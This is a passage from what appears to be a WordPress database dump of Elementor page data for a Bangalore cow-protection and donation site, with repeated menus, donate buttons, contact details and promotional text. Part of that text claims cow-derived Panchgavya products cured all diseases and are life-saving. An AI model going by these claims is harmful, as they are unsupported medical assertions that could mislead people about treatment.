Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10969,1825,'_elementor_page_assets','a:0:{}'),(10971,1826,'_elementor_edit_mode','builder'),(10972,1826,'_elementor_template_type','wp-page'),(10973,1826,'_elementor_version','3.7.8'),(10974,1826,'_wp_page_template','elementor_canvas'),(10975,1826,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10976,1826,'_elementor_page_assets','a:0:{}'),(10978,1827,'_elementor_edit_mode','builder'),(10979,1827,'_elementor_template_type','wp-page'),(10980,1827,'_elementor_version','3.7.8'),(10981,1827,'_wp_page_template','elementor_canvas'),(10982,1827,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10983,1827,'_elementor_page_assets','a:0:{}'),(10987,1828,'_elementor_edit_mode','builder'),(10988,1828,'_elementor_template_type','wp-page'),(10989,1828,'_elementor_version','3.7.8'),(10990,1828,'_wp_page_template','elementor_canvas'),(10991,1828,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10992,1828,'_elementor_page_assets','a:0:{}'),(10994,1829,'_elementor_edit_mode','builder'),(10995,1829,'_elementor_template_type','wp-page'),(10996,1829,'_elementor_version','3.7.8'),(10997,1829,'_wp_page_template','elementor_canvas'),(10998,1829,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"